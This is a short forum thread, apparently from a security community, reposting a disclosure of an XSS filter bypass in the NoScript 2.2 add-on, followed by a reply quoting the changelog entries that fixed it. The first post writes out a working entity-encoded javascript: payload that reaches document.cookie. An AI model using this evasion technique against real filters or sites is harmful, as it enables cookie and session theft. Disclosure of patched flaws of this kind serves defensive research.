Jump to content
Nytro

NoScript 2.2 XSS Filter Bypass

Recommended Posts

NoScript 2.2 XSS Filter Bypass

// NoScript 2.2 XSS Filter Bypass (fixed with 2.2.1rc1 and 2.2.1rc2 literally minutes after reporting)

// URL

test.php?xss=<a href="javascript%26colon;'%26percnt;3cscript%26percnt;3ealert%26lpar;document.cookie%26rpar;%26percnt;
3c/script%26percnt;3e'">CLICKME

// Result

<a href="javascript&colon;'&percnt;3cscript&percnt;3ealert&lpar;document.cookie&rpar;&percnt;3c/script&percnt;3e'">CLICKME

// After click

javascript:'<script>alert(document.cookie)</script>'

// JS URI runs in context of the referrer - cookie access (and more) is possible

Author: I don't know...

Sursa: http://pastebin.com/raw.php?i=W1q6BciY

Link to comment
Share on other sites

Fixed in 2.2.1:


NoScript CHANGELOG

[[B][COLOR=green]+[/COLOR][/B]] new feature, [[B][COLOR=red]x[/COLOR][/B]] bug fix, [-] removed feature, [=] repackaging or cosmetic change
v [B]2.2.1[/B]
==========================================================================
[COLOR=green][B]+[/B][/COLOR] [Locale] Updated he-il (thanks baryoni)
[COLOR=red][B]x[/B][/COLOR] [ClearClick] Fixed incompatibility with the FoxTab add-on

v [B]2.2.1rc2[/B]
==========================================================================
[COLOR=green][B]+[/B][/COLOR] [XSS] Deeper decoding on sanitization (thanks .mario for reporting)

v [B]2.2.1rc1[/B]
==========================================================================
[COLOR=green][B]+[/B][/COLOR] [XSS] More accurate recursive decoding (thanks .mario for reporting)

Adaugare: N-am vazut in raw-ul de pe pastebin ca s-a specificat, scuzati.

Edited by Flubber
sorry
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...